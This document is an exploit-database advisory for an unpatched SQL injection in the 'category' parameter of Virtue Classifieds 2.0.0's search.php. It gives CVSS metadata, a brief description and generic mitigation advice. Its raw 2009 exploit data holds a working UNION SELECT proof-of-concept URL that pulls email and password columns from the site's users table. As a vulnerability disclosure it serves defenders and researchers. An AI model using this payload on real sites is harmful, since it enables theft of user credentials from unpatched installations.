Virtue Classifieds SQL Injection Vulnerability

vendor:

Virtue Classifieds

by:

C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Virtue Classifieds

Affected Version From: 2.0.0

Affected Version To: 2.0.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Virtue Classifieds SQL Injection Vulnerability

Virtue Classifieds is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. This issue affects Virtue Classifieds version 2.0.0; other versions may also be vulnerable.

Mitigation:

Users should avoid using untrusted input in SQL queries. Developers should sanitize user-supplied input before using it in an SQL query.

Source

Exploit-DB raw data:

#################################################################################################################################################

CMS : Virtue Classifieds
WEB : http://www.virtuenetz.com/classified/
Archivo : search.php
Variable Tipo : GET
Valor : category
Tipo : SQL Injection
Url : http:/www.site.com/search.php?category=[SQLI]

PoC:

http:/www.site.com/search.php?category=2+and+1=0+union+select+all+1,2,concat_ws(0x3A,email,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.

100% CHILE
WWW.UNDERSECURITY.NET

##################################################################################################################################################

# milw0rm.com [2009-06-08]